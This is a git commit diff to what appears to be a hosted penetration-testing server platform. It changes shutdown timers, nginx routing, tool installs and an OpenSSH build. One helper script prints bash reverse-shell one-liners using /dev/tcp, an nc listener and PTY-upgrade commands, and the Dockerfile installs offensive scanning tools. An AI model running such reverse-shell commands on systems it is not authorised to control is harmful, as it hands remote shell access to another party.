guest docker bumping

This commit is contained in:
SkyperTHC 2024-01-20 20:44:05 +00:00
parent fc10201e80
commit 44f0018fff
No known key found for this signature in database
GPG Key ID: A9BD386DF9113CD6
21 changed files with 324 additions and 264 deletions

@ -1,7 +1,10 @@
0.5.4 - 2023-02-00 0.5.4 - 2023-02-00
* OpenSSH 9.6p1
* rshell * rshell
* sploitscan * sploitscan
* OpenVPN (curl sf/vpn) * OpenVPN (curl sf/ovpn)
* Different auto-shutdown timers for FREE and TOKEN users
* Syscop login message after auto-shutdown
0.5.2 - 2023-12-00 0.5.2 - 2023-12-00
* Kali 2023.4 * Kali 2023.4

@ -119,6 +119,7 @@ FILES_PROVISION += "segfault-$(VER)/provision/update.sh"
FILES_ENCFSD += "segfault-$(VER)/encfsd/Makefile" FILES_ENCFSD += "segfault-$(VER)/encfsd/Makefile"
FILES_ENCFSD += "segfault-$(VER)/encfsd/Dockerfile" FILES_ENCFSD += "segfault-$(VER)/encfsd/Dockerfile"
FILES_ENCFSD += "segfault-$(VER)/encfsd/destructor.sh" FILES_ENCFSD += "segfault-$(VER)/encfsd/destructor.sh"
FILES_ENCFSD += "segfault-$(VER)/encfsd/funcs_destructor.sh"
FILES_ENCFSD += "segfault-$(VER)/encfsd/encfsd.sh" FILES_ENCFSD += "segfault-$(VER)/encfsd/encfsd.sh"
FILES_ENCFSD += "segfault-$(VER)/encfsd/portd.sh" FILES_ENCFSD += "segfault-$(VER)/encfsd/portd.sh"
@ -137,6 +138,7 @@ FILES_GSNC += "segfault-$(VER)/gsnc/sf-gsnc.sh"
FILES_CONFIG += "segfault-$(VER)/config/etc/nginx/nginx.conf" FILES_CONFIG += "segfault-$(VER)/config/etc/nginx/nginx.conf"
FILES_CONFIG += "segfault-$(VER)/config/etc/nginx/nginx-rpc.conf" FILES_CONFIG += "segfault-$(VER)/config/etc/nginx/nginx-rpc.conf"
FILES_CONFIG += "segfault-$(VER)/config/etc/sf/sf.conf" FILES_CONFIG += "segfault-$(VER)/config/etc/sf/sf.conf"
FILES_CONFIG += "segfault-$(VER)/config/etc/sf/timers.conf"
FILES_CONFIG += "segfault-$(VER)/config/etc/redis/redis.conf" FILES_CONFIG += "segfault-$(VER)/config/etc/redis/redis.conf"
FILES_CONFIG += "segfault-$(VER)/config/etc/sf/WARNING---SHARED-BETWEEN-ALL-SERVERS---README.txt" FILES_CONFIG += "segfault-$(VER)/config/etc/sf/WARNING---SHARED-BETWEEN-ALL-SERVERS---README.txt"
FILES_CONFIG += "segfault-$(VER)/config/etc/resolv.conf" FILES_CONFIG += "segfault-$(VER)/config/etc/resolv.conf"
@ -156,7 +158,7 @@ FILES_ROOT += "segfault-$(VER)/sfbin/funcs.sh"
FILES_ROOT += "segfault-$(VER)/sfbin/funcs_redis.sh" FILES_ROOT += "segfault-$(VER)/sfbin/funcs_redis.sh"
FILES_ROOT += "segfault-$(VER)/sfbin/funcs_admin.sh" FILES_ROOT += "segfault-$(VER)/sfbin/funcs_admin.sh"
FILES_ROOT += "segfault-$(VER)/sfbin/funcs_net.sh" FILES_ROOT += "segfault-$(VER)/sfbin/funcs_net.sh"
FILES_ROOT += "segfault-$(VER)/sfbin/funcs_vpn.sh" FILES_ROOT += "segfault-$(VER)/sfbin/funcs_ovpn.sh"
FILES_ROOT += "segfault-$(VER)/sfbin/ovpn_up.sh" FILES_ROOT += "segfault-$(VER)/sfbin/ovpn_up.sh"
FILES_ROOT += "segfault-$(VER)/sfbin/sf" FILES_ROOT += "segfault-$(VER)/sfbin/sf"
FILES_ROOT += "segfault-$(VER)/sfbin/banhammer.sh" FILES_ROOT += "segfault-$(VER)/sfbin/banhammer.sh"

@ -69,13 +69,15 @@ http {
gzip off; gzip off;
location / { location / {
try_files $uri $uri/ = 404; #try_files $uri $uri/ = 404;
rewrite /net /net/; rewrite ^/net$ /net/ last;
rewrite /vpn /vpn/; rewrite ^/ovpn$ /ovpn/ last;
rewrite /wg /wg/; rewrite ^/vpn$ /ovpn/ last;
rewrite /dmesg /dmesg/; rewrite ^/wg$ /wg/ last;
rewrite /port /port/; rewrite ^/dmesg$ /dmesg/ last;
rewrite /set /set/; rewrite ^/port$ /port/ last;
rewrite ^/set$ /set/ last;
rewrite ^/vpn/(.*)$ /ovpn/$1 last;
location ~* ^/set/.* { location ~* ^/set/.* {
fastcgi_param REMOTE_ADDR $remote_addr; fastcgi_param REMOTE_ADDR $remote_addr;
@ -101,11 +103,11 @@ http {
fastcgi_param SCRIPT_FILENAME /cgi-bin/rpc; fastcgi_param SCRIPT_FILENAME /cgi-bin/rpc;
fastcgi_pass unix:/dev/shm/sf/master/fcgiwrap.socket; fastcgi_pass unix:/dev/shm/sf/master/fcgiwrap.socket;
} }
location ~* ^/vpn/.* { location ~* ^/ovpn/.* {
fastcgi_param REMOTE_ADDR $remote_addr; fastcgi_param REMOTE_ADDR $remote_addr;
fastcgi_param REQUEST_URI $request_uri; fastcgi_param REQUEST_URI $request_uri;
fastcgi_param REQUEST_BODY $request_body; fastcgi_param REQUEST_BODY $request_body;
fastcgi_param FCGI_CMD vpn; fastcgi_param FCGI_CMD ovpn;
fastcgi_param SCRIPT_FILENAME /cgi-bin/rpc; fastcgi_param SCRIPT_FILENAME /cgi-bin/rpc;
fastcgi_pass unix:/dev/shm/sf/master/fcgiwrap.socket; fastcgi_pass unix:/dev/shm/sf/master/fcgiwrap.socket;
} }

@ -0,0 +1,6 @@
#SF_TIMEOUT_WITH_SHELL=$((60 * 60 * 36))
#SF_TIMEOUT_NO_SHELL=$((60 * 60 * 1))
#SF_TIMEOUT_TOKEN_WITH_SHELL=$((60 * 60 * 24 * 7))
#SF_TIMEOUT_TOKEN_NO_SHELL=$((60 * 60 * 36))

@ -40,7 +40,7 @@ services:
devices: devices:
- "/dev/fuse:/dev/fuse" - "/dev/fuse:/dev/fuse"
volumes: volumes:
- "${SF_BASEDIR:-.}/config/db:/config/db:ro" - "${SF_BASEDIR:-.}/config/db:/config/db:rw"
- "${SF_BASEDIR:-.}/config/etc/sf:/config/etc/sf:ro" - "${SF_BASEDIR:-.}/config/etc/sf:/config/etc/sf:ro"
- "${SF_BASEDIR:-.}/data:/encfs/raw" - "${SF_BASEDIR:-.}/data:/encfs/raw"
- "${SF_SHMDIR:-/dev/shm/sf}/encfs-sec:/encfs/sec:shared" - "${SF_SHMDIR:-/dev/shm/sf}/encfs-sec:/encfs/sec:shared"
@ -76,6 +76,7 @@ services:
- "/dev/fuse:/dev/fuse" - "/dev/fuse:/dev/fuse"
volumes: volumes:
- "${SF_BASEDIR:-.}/config/db:/config/db:ro" - "${SF_BASEDIR:-.}/config/db:/config/db:ro"
- "${SF_BASEDIR:-.}/config/etc/sf:/config/etc/sf:ro"
- "${SF_BASEDIR:-.}/data:/encfs/raw" - "${SF_BASEDIR:-.}/data:/encfs/raw"
- "${SF_SHMDIR:-/dev/shm/sf}/self-for-guest:/config/self-for-guest" - "${SF_SHMDIR:-/dev/shm/sf}/self-for-guest:/config/self-for-guest"
- "${SF_SHMDIR:-/dev/shm/sf}/encfs-sec:/encfs/sec:shared" - "${SF_SHMDIR:-/dev/shm/sf}/encfs-sec:/encfs/sec:shared"

@ -9,4 +9,4 @@ RUN apk add --no-cache --upgrade \
encfs \ encfs \
redis \ redis \
xfsprogs-extra xfsprogs-extra
COPY destructor.sh encfsd.sh portd.sh / COPY destructor.sh funcs_destructor.sh encfsd.sh portd.sh /

@ -3,149 +3,28 @@
# shellcheck disable=SC1091 # Do not follow # shellcheck disable=SC1091 # Do not follow
source /sf/bin/funcs.sh source /sf/bin/funcs.sh
source /sf/bin/funcs_redis.sh source /sf/bin/funcs_redis.sh
SF_TIMEOUT_WITH_SHELL=604800 # Defaults
SF_TIMEOUT_NO_SHELL=129600 SF_TIMEOUT_WITH_SHELL=$((60 * 60 * 36))
SF_TIMEOUT_NO_SHELL=$((60 * 60 * 1))
SF_TIMEOUT_TOKEN_WITH_SHELL=$((60 * 60 * 24 * 7))
SF_TIMEOUT_TOKEN_NO_SHELL=$((60 * 60 * 36))
[[ -n $SF_DEBUG ]] && { [[ -n $SF_DEBUG ]] && {
SF_TIMEOUT_WITH_SHELL=180 SF_TIMEOUT_WITH_SHELL=60
SF_TIMEOUT_NO_SHELL=120 SF_TIMEOUT_NO_SHELL=15
} SF_TIMEOUT_TOKEN_WITH_SHELL=120
SF_TIMEOUT_TOKEN_NO_SHELL=90
# [LID] <1=encfs> <1=Container> <message>
# Either parameter can be "" to not stop encfs or lg-container
stop_lg()
{
local is_encfs
local is_container
local lid
local ts_born
lid="$1"
ts_born="$2"
is_encfs="$3"
is_container="$4"
LOG "$lid" "Stopping [$((NOW - ts_born)) sec]. $5"
red RPUSH portd:cmd "remport ${lid}" >/dev/null
rm -f "/sf/run/encfsd/user/lg-${lid}"
rm -f "/sf/run/pids/lg-${lid}.pid"
rm -f "/sf/run/ips/lg-${lid}.ip"
rm -rf "/config/self-for-guest/lg-${lid}"
rm -rf "/sf/run/users/lg-${lid}"
# Kill the OpenVPN process (if running)
docker exec sf-master killall "openvpn-$lid" 2>/dev/null
docker exec sf-master rm -rf "/tmp/lg-$lid" 2>/dev/null
# Tear down container
[[ -n $is_container ]] && docker stop "lg-$lid" &>/dev/nuill
# Odd: On cgroup2 the command 'docker top lg-*' shows that encfs is running
# inside the container even that we never moved it into the container's
# Process Namespace. EncFS will also die when the lg- is shut down.
# This is only neede for cgroup1:
[[ -n $is_encfs ]] && {
pkill -SIGTERM -f "^\[encfs-${lid}\]" 2>/dev/null
# Give kernel time to unmount mountpoint
sleep 1
}
# Do not use 'rm -rf' here as this might still be a mounted drive
# when encfsd is not killed fast enough (failing to delete is acceptable).
rm -f "/encfs/sec/lg-${lid}/THIS-DIRECTORY-IS-NOT-ENCRYPTED--DO-NOT-USE.txt"
rmdir "/encfs/sec/lg-${lid}"
}
# [lg-$LID]
# Check if lg- is running and
# 1. EncFS died
# 2. Container should be stopped (stale, idle)
check_container()
{
local c
local lid
local i
local IFS
local fn
local comm
local ts_logout
local ts_born
IFS=$'\n'
c="$1"
lid="${c#lg-}"
[[ ${#lid} -ne 10 ]] && return
ts_born=$(stat -c %Y "/sf/run/encfsd/user/lg-${lid}") || { ERR "[${CDM}${lid}${CN}] run/encfsd/user/lg-* missing?"; return; }
# Skip if EncFS only started recently (zsh not yet started).
[[ $((NOW - ts_born)) -lt 20 ]] && return 0
# Check if EncFS is still running.
pgrep -f "^\[encfs-${lid}\]" &>/dev/null || {
# NOTE: On CGROUPv2 the encfs dies when the lg container stops (user called 'halt' or 'docker stop')
stop_lg "$lid" "${ts_born}" "" "lg" "EncFS died..."
return
}
# ts_logout may not exist (stale)
ts_logout=0
fn="/config/db/user/lg-${lid}/ts_logout"
[[ -f "$fn" ]] && ts_logout=$(stat -c %Y "$fn")
# Check if there is still a shell running inside the container:
IFS=""
set -o pipefail
comm=$(docker top "lg-${lid}" -eo pid,comm 2>/dev/null | tail +2 | awk '{print $2;}') || {
# HERE: lg died or top failed.
set +o pipefail
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "LG no longer running."
return
}
set +o pipefail
# Note: We must set 'set +o pipefail' (e.g. fail only if last command errors). Otherwise the rare
# condition can happen where grep exits (first match found) but 'echo' is still writing. Then echo
# will receive a SIGPIPE and exit with 141 and the entire pipe will fail.
# [[ -f "/config/db/user/lg-${lid}/is_logged_in" ]] && return
# FIXME: many stale is_logged_in exists without ssh connected ;/
# HERE: LG & EncFS are running.
echo "$comm" | grep -m1 -E '(^zsh$|^bash$|^sh$|^sftp-server$)' >/dev/null && {
# HERE: User still has shell running
[[ -f "/config/db/user/lg-${lid}/is_logged_in" ]] && return
[[ $((NOW - ts_logout)) -lt ${SF_TIMEOUT_WITH_SHELL} ]] && return
# HERE: Not logged in. logged out more than 1 week ago.
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "Not logged in for $((NOW - ts_logout))sec (shell running)."
return
}
# HERE: No shell running, ts_logout=0 if never logged out
# Skip if only recently logged out.
[[ $((NOW - ts_logout)) -lt 60 ]] && return # Recently logged out.
# Filter out stale processes
echo "$comm" | grep -m1 -v -E '(^docker-init$|^sleep$|^encfs$|^gpg-agent$)' >/dev/null || {
# HERE: Nothing running but stale processes
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "No processes running."
return
}
# HERE: Something running (but no shell, and no known processes)
[[ $((NOW - ts_logout)) -ge ${SF_TIMEOUT_NO_SHELL} ]] && {
# User logged out 1.5 days ago. No shell. No known processes.
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "Not logged in for ${SF_TIMEOUT_NO_SHELL}sec (no shell running)."
return
}
# HERE: No shell. No known processes. Less than 1.5 days ago.
} }
[[ ! -S /var/run/docker.sock ]] && ERREXIT 255 "Not found: /var/run/docker.sock" [[ ! -S /var/run/docker.sock ]] && ERREXIT 255 "Not found: /var/run/docker.sock"
source /funcs_destructor.sh || ERREXIT 255
export REDISCLI_AUTH="${SF_REDIS_AUTH}" export REDISCLI_AUTH="${SF_REDIS_AUTH}"
while :; do while :; do
sleep 30 sleep 30
source /config/etc/sf/timers.conf 2>/dev/null
source /funcs_destructor.sh 2>/dev/null
NOW=$(date +%s) NOW=$(date +%s)
# Every 30 seconds check all container we are tracking (from encfsd) # Every 30 seconds check all container we are tracking (from encfsd)
containers=($(cd /sf/run/encfsd/user && echo lg-*)) containers=($(cd /sf/run/encfsd/user && echo lg-*))

153
encfsd/funcs_destructor.sh Executable file

@ -0,0 +1,153 @@
# [LID] <1=encfs> <1=Container> <message>
# Either parameter can be "" to not stop encfs or lg-container
stop_lg()
{
local is_encfs
local is_container
local lid
local ts_born
lid="$1"
ts_born="$2"
is_encfs="$3"
is_container="$4"
LOG "$lid" "Stopping [$((NOW - ts_born)) sec]. $5"
red RPUSH portd:cmd "remport ${lid}" >/dev/null
rm -f "/sf/run/encfsd/user/lg-${lid}"
rm -f "/sf/run/pids/lg-${lid}.pid"
rm -f "/sf/run/ips/lg-${lid}.ip"
rm -rf "/config/self-for-guest/lg-${lid}"
rm -rf "/sf/run/users/lg-${lid}"
# Kill the OpenVPN process (if running)
docker exec sf-master killall "openvpn-$lid" 2>/dev/null
docker exec sf-master rm -rf "/tmp/lg-$lid" 2>/dev/null
# Tear down container
[[ -n $is_container ]] && docker stop "lg-$lid" &>/dev/nuill
# Odd: On cgroup2 the command 'docker top lg-*' shows that encfs is running
# inside the container even that we never moved it into the container's
# Process Namespace. EncFS will also die when the lg- is shut down.
# This is only neede for cgroup1:
[[ -n $is_encfs ]] && {
pkill -SIGTERM -f "^\[encfs-${lid}\]" 2>/dev/null
# Give kernel time to unmount mountpoint
sleep 1
}
# Do not use 'rm -rf' here as this might still be a mounted drive
# when encfsd is not killed fast enough (failing to delete is acceptable).
rm -f "/encfs/sec/lg-${lid}/THIS-DIRECTORY-IS-NOT-ENCRYPTED--DO-NOT-USE.txt"
rmdir "/encfs/sec/lg-${lid}"
}
try_syscop_msg() {
local lid="$1"
echo -en "\
🤷‍♂️ ${CDM}Your server shut down automatically because you did not log in for $(( (NOW - ts_logout) / 60 / 60 )) h.
🫵 Please type ${CDC}halt${CDM} to stop your server or...
❤️ ...get a ${CM}TOKEN${CDM} to stop this message: ${CUL}${CB}https://thc.org/sf/token${CN}${CDM}
🌈 ${CW}Yours sincerely, The SysCops 😘 ${CN}
">"/config/db/user/lg-${lid:?}/syscop-msg.txt"
}
# [lg-$LID]
# Check if lg- is running and
# 1. EncFS died
# 2. Container should be stopped (stale, idle)
check_container()
{
local c
local lid
local IFS=$'\n'
local fn
local comm
local ts_logout
local ts_born
local to_with_shell=$SF_TIMEOUT_WITH_SHELL
local to_no_shell=$SF_TIMEOUT_NO_SHELL
local is_token
c="$1"
lid="${c#lg-}"
[[ ${#lid} -ne 10 ]] && return
ts_born=$(stat -c %Y "/sf/run/encfsd/user/lg-${lid}") || { ERR "[${CDM}${lid}${CN}] run/encfsd/user/lg-* missing?"; return; }
# Skip if EncFS only started recently (zsh not yet started).
[[ $((NOW - ts_born)) -lt 20 ]] && return 0
# Check if EncFS is still running.
pgrep -f "^\[encfs-${lid}\]" &>/dev/null || {
# NOTE: On CGROUPv2 the encfs dies when the lg container stops (user called 'halt' or 'docker stop')
stop_lg "$lid" "${ts_born}" "" "lg" "EncFS died..."
return
}
# ts_logout may not exist (stale)
ts_logout=0
fn="/config/db/user/lg-${lid}/ts_logout"
[[ -f "$fn" ]] && ts_logout=$(stat -c %Y "$fn")
# Check if there is still a shell running inside the container:
IFS=""
set -o pipefail
comm=$(docker top "lg-${lid}" -eo pid,comm 2>/dev/null | tail +2 | awk '{print $2;}') || {
# HERE: lg died or top failed.
set +o pipefail
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "LG no longer running."
return
}
# Load timers
[[ -e "/config/db/user/lg-${lid}/token" ]] && {
to_with_shell=$SF_TIMEOUT_TOKEN_WITH_SHELL
to_no_shell=$SF_TIMEOUT_TOKEN_NO_SHELL
is_token=1
}
set +o pipefail
# Note: We must set 'set +o pipefail' (e.g. fail only if last command errors). Otherwise the rare
# condition can happen where grep exits (first match found) but 'echo' is still writing. Then echo
# will receive a SIGPIPE and exit with 141 and the entire pipe will fail.
# [[ -f "/config/db/user/lg-${lid}/is_logged_in" ]] && return
# FIXME: many stale is_logged_in exists without ssh connected ;/
# HERE: LG & EncFS are running.
echo "$comm" | grep -m1 -E '(^zsh$|^bash$|^sh$|^sftp-server$)' >/dev/null && {
# HERE: User still has shell running
[[ -f "/config/db/user/lg-${lid}/is_logged_in" ]] && return
[[ $((NOW - ts_logout)) -lt ${to_with_shell} ]] && return
# HERE: Not logged in. logged out more than 1 week ago.
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "Not logged in for $((NOW - ts_logout))sec (shell running)."
[[ -z $is_token ]] && try_syscop_msg "$lid"
return
}
# HERE: No shell running, ts_logout=0 if never logged out
# Skip if only recently logged out.
[[ $((NOW - ts_logout)) -lt 60 ]] && return # Recently logged out.
# Filter out stale processes
echo "$comm" | grep -m1 -v -E '(^docker-init$|^sleep$|^encfs$|^gpg-agent$)' >/dev/null || {
# HERE: Nothing running but stale processes
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "No processes running."
return
}
# HERE: Something running (but no shell, and no known processes)
[[ $((NOW - ts_logout)) -ge ${to_no_shell} ]] && {
# User logged out 1.5 days ago. No shell. No known processes.
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "Not logged in for ${to_no_shell}sec (no shell running)."
[[ -z $is_token ]] && try_syscop_msg "$lid"
return
}
# HERE: No shell. No known processes. Less than 1.5 days ago.
}

@ -614,11 +614,11 @@ RUN /pkg-install.sh HACK ghbin shadow1ng/fscan 'fscan%arch:x86_64=:aarch64=_arm6
&& /pkg-install.sh HACK ghbin 'theaog/spirit' 'spirit%arch:x86_64=:DEFAULT=SKIP%.tgz$' spirit `# x86_64 only, spirit-arm bad` \ && /pkg-install.sh HACK ghbin 'theaog/spirit' 'spirit%arch:x86_64=:DEFAULT=SKIP%.tgz$' spirit `# x86_64 only, spirit-arm bad` \
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/tomnomnom/gf@latest \ && /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/tomnomnom/gf@latest \
&& mkdir -p /usr/share/gf \ && mkdir -p /usr/share/gf \
&& svn export https://github.com/tomnomnom/gf/trunk /tmp/gf \ && git clone --depth 1 https://github.com/tomnomnom/gf.git /tmp/gf \
&& mv /tmp/gf/examples/*.json /usr/share/gf \ && mv /tmp/gf/examples/*.json /usr/share/gf \
&& mv /tmp/gf/gf-completion.* /usr/share/gf \ && mv /tmp/gf/gf-completion.* /usr/share/gf \
&& rm -rf /tmp/gf \ && rm -rf /tmp/gf \
&& svn export https://github.com/1ndianl33t/Gf-Patterns/trunk/ /tmp/gf \ && git clone --depth 1 https://github.com/1ndianl33t/Gf-Patterns.git /tmp/gf \
&& mv /tmp/gf/*.json /usr/share/gf; }' \ && mv /tmp/gf/*.json /usr/share/gf; }' \
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/tomnomnom/hacks/inscope@latest; }' \ && /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/tomnomnom/hacks/inscope@latest; }' \
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/Emoe/kxss@latest; }' \ && /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/Emoe/kxss@latest; }' \
@ -631,7 +631,8 @@ RUN /pkg-install.sh HACK ghbin shadow1ng/fscan 'fscan%arch:x86_64=:aarch64=_arm6
&& cmake . \ && cmake . \
&& make \ && make \
&& cp urldedupe /usr/bin; }' \ && cp urldedupe /usr/bin; }' \
&& /pkg-install.sh HACK bash -c '{ svn export https://github.com/urbanadventurer/username-anarchy/trunk /opt/username-anarchy; }' \ && /pkg-install.sh HACK bash -c '{ git clone --depth 1 https://github.com/urbanadventurer/username-anarchy.git /opt/username-anarchy \
&& rm -rf /opt/username-anarchy/.git*; }' \
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/damit5/gitdorks_go@latest; }' \ && /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/damit5/gitdorks_go@latest; }' \
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/trickest/dsieve@master; }' \ && /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/trickest/dsieve@master; }' \
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/trickest/enumerepo@latest; }' \ && /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/trickest/enumerepo@latest; }' \
@ -802,8 +803,8 @@ RUN /pkg-install.sh HACK ghbin ekzhang/bore '%arch:aarch64=arm%-unknown-linux'
&& /pkg-install.sh HACK bin 'https://github.com/RustScan/RustScan/releases/download/2.0.1/rustscan_2.0.1_amd64.deb' `# x86_64 only` \ && /pkg-install.sh HACK bin 'https://github.com/RustScan/RustScan/releases/download/2.0.1/rustscan_2.0.1_amd64.deb' `# x86_64 only` \
&& /pkg-install.sh HACK bin 'https://github.com/xaitax/SploitScan/raw/main/sploitscan.py' sploitscan \ && /pkg-install.sh HACK bin 'https://github.com/xaitax/SploitScan/raw/main/sploitscan.py' sploitscan \
&& /pkg-install.sh HACK ghbin hueristiq/xurlfind3r 'linux_%arch:x86_64=amd64:aarch64=arm64%' xurlfind3r && /pkg-install.sh HACK ghbin hueristiq/xurlfind3r 'linux_%arch:x86_64=amd64:aarch64=arm64%' xurlfind3r
RUN /pkg-install.sh LARGE ghbin PaddiM8/kalker 'linux' kalker \ RUN /pkg-install.sh LARGE ghbin PaddiM8/kalker 'linux' kalker
&& /pkg-install.sh LARGE ghbin PowerShell/PowerShell 'deb_%arch1%.deb' ## YANKED. Already in apt-get install powershell/pkg-install.sh LARGE ghbin PowerShell/PowerShell 'deb_%arch1%.deb'
RUN /pkg-install.sh HACK bash -c '{ wget -O "/usr/bin/favfreak.py" https://raw.githubusercontent.com/devanshbatham/FavFreak/master/favfreak.py \ RUN /pkg-install.sh HACK bash -c '{ wget -O "/usr/bin/favfreak.py" https://raw.githubusercontent.com/devanshbatham/FavFreak/master/favfreak.py \
&& chmod 755 /usr/bin/favfreak.py \ && chmod 755 /usr/bin/favfreak.py \
&& ln -s favfreak.py /usr/bin/FavFreak; }' \ && ln -s favfreak.py /usr/bin/FavFreak; }' \

@ -293,8 +293,10 @@ alias nocol=noansi
# Make the Project name visibile in the PS1 prompt # Make the Project name visibile in the PS1 prompt
[[ -z $VIRTUAL_ENV ]] && VIRTUAL_ENV="${SF_PRJ}" [[ -z $VIRTUAL_ENV ]] && VIRTUAL_ENV="${SF_PRJ}"
PATH="${HOME:-/sec/root}/go/bin:${HOME:-/sec/root}/.cargo/bin:/sec/root/.local/bin:/sec/usr/sbin:/sec/usr/bin:/sf/bin:$PATH"
PATH="${HOME:-/sec/root}/go/bin:${HOME:-/sec/root}/.cargo/bin:/sec/root/.local/bin:/sec/usr/sbin:/sec/usr/bin:/sf/bin:/usr/local/go/bin:$PATH"
[[ -d /usr/share/doc/python3-impacket/examples ]] && PATH="${PATH}:/usr/share/doc/python3-impacket/examples" [[ -d /usr/share/doc/python3-impacket/examples ]] && PATH="${PATH}:/usr/share/doc/python3-impacket/examples"
export PATH
_sf_info_non_perm() _sf_info_non_perm()
{ {

@ -16,31 +16,31 @@ ERREXIT() {
exit "${code:-99}" exit "${code:-99}"
} }
[[ ! -f /config/self/reverse_port ]] && curl sf/port
load rport /config/self/reverse_port || ERREXIT 255 "No reverse port found. Try ${CC}curl sf/port${CN}." load rport /config/self/reverse_port || ERREXIT 255 "No reverse port found. Try ${CC}curl sf/port${CN}."
load rip /config/self/reverse_ip || ERREXIT 255 "No reverse port found. Try ${CC}curl sf/port${CN}." load rip /config/self/reverse_ip || ERREXIT 255 "No reverse port found. Try ${CC}curl sf/port${CN}."
echo -e "\ echo -e "\
Use any of these commands on the remote system:${CDR} Use one of these commands on the remote system:
bash -c '(exec bash -i &>/dev/tcp/${rip}/${rport} 0>&1) &' 1. ${CDR}bash -c '(exec bash -i &>/dev/tcp/${rip}/${rport} 0>&1) &'${CN}
(bash -i &>/dev/tcp/${rip}/${rport} 0>&1) & 2. ${CDR}(bash -i &>/dev/tcp/${rip}/${rport} 0>&1) &${CN}
${CN} ${CN}Once connected, cut & paste the following into the _this_ shell:
Once connected, cut & paste this into the remote shell:${CDC} ${CF}-------------------------------------------------------------------------------${CDC}
command -v python >/dev/null \\ command -v python >/dev/null \\
&& exec python -c 'import pty; pty.spawn(\"bash\")' \\ && exec python -c 'import pty; pty.spawn(\"bash\")' \\
|| exec script -qc bash /dev/null || exec script -qc bash /dev/null
export SHELL=/bin/bash TERM=xterm-256color
export SHELL=/bin/bash
export TERM=xterm-256color
reset -I reset -I
PS1='"'\[\\033[36m\]\\u\[\\033[m\]@\[\\033[32m\]\\h:\[\\033[33;1m\]\\w\[\\033[m\]\\$ '"' PS1='"'\[\\033[36m\]\\u\[\\033[m\]@\[\\033[32m\]\\h:\[\\033[33;1m\]\\w\[\\033[m\]\\$ '"'
"'stty -echo;printf "\\033[18t";read -rdt R;stty sane $(echo "$R"|awk -F";" '"'"'{ printf "rows "$3" cols "$2; }'"'"')'" "'stty -echo;printf "\\033[18t";read -rdt R;stty sane $(echo "$R"|awk -F";" '"'"'{ printf "rows "$3" cols "$2; }'"'"')'"
${CN}To force-exit this shell, type ${CDY}kill \"\$(pgrep -P $$)\"${CN} ${CN}${CF}-------------------------------------------------------------------------------${CN}
-----------------------------------" To force-exit this listener, type ${CDY}kill \"\$(pgrep -P $$)\"${CN} on your Root Server"
# PS1='USERS=$(who | wc -l) LOAD=$(cut -f1 -d" " /proc/loadavg) PS=$(ps -e --no-headers|wc -l) \[\e[36m\]\u\[\e[m\]@\[\e[32m\]\h:\[\e[33;1m\]\w \[\e[0;31m\]\$\[\e[m\] ' # PS1='USERS=$(who | wc -l) LOAD=$(cut -f1 -d" " /proc/loadavg) PS=$(ps -e --no-headers|wc -l) \[\e[36m\]\u\[\e[m\]@\[\e[32m\]\h:\[\e[33;1m\]\w \[\e[0;31m\]\$\[\e[m\] '
cfg=$(stty --save) cfg=$(stty --save)
stty raw -echo opost stty raw -echo opost
time nc -vnlp "$rport" echo -e "${CDG}Listening on ${CG}${rip}:${rport}${CN}"
echo "Restoring TTY" nc -nlp "$rport"
echo "🦋 Restoring terminal..."
stty "$cfg" stty "$cfg"
# reset -I # reset -I

@ -1,29 +1,34 @@
VER=9.6p1
all: albuild fs-root/bin/docker-exec-sigproxy fs-root/bin/unix-socket-client fs-root/usr/sbin/sshd Dockerfile all: albuild fs-root/bin/docker-exec-sigproxy fs-root/bin/unix-socket-client fs-root/usr/sbin/sshd Dockerfile
docker build --no-cache --network host -t sf-host . docker build --no-cache --network host -t sf-host .
albuild: albuild:
bash -c "docker run --rm alpine-gcc true || \ bash -c "docker run --rm sf-alpine-gcc true || \
docker commit alpine-gcc alpine-gcc || { \ docker commit sf-alpine-gcc sf-alpine-gcc || { \
docker run --network host --name alpine-gcc alpine sh -c 'apk update && apk add gcc patch libc-dev musl-dev zlib-dev openssl-dev make linux-headers libcap-dev bash' \ docker run --network host --name sf-alpine-gcc alpine sh -c 'apk update && apk add gcc patch libc-dev musl-dev zlib-dev openssl-dev make linux-headers libcap-dev bash' \
&& docker commit alpine-gcc alpine-gcc; }" && docker commit sf-alpine-gcc sf-alpine-gcc; }"
# See mk_sshd.sh for manual debugging # See mk_sshd.sh for manual debugging
fs-root/usr/sbin/sshd: sf-sshd.patch mk_sshd.sh fs-root/usr/sbin/sshd: albuild sf-sshd.patch mk_sshd.sh
docker run --rm -v$$(pwd):/src --net=host -w /tmp alpine-gcc /src/mk_sshd.sh docker run --rm -v$$(pwd):/src --net=host -w /tmp --env VER=$(VER) sf-alpine-gcc /src/mk_sshd.sh
@echo "Type 'make diff' to create a sf-sshd-$(VER).patch"
fs-root/bin/docker-exec-sigproxy: docker-exec-sigproxy.c fs-root/bin/docker-exec-sigproxy: docker-exec-sigproxy.c
docker run --rm -v$$(pwd):/src -w /src alpine-gcc gcc -Wall -O2 -o fs-root/bin/docker-exec-sigproxy docker-exec-sigproxy.c docker run --rm -v$$(pwd):/src -w /src sf-alpine-gcc gcc -Wall -O2 -o fs-root/bin/docker-exec-sigproxy docker-exec-sigproxy.c
@echo SUCCESS @echo SUCCESS
fs-root/bin/unix-socket-client: unix-socket-client.c fs-root/bin/unix-socket-client: unix-socket-client.c
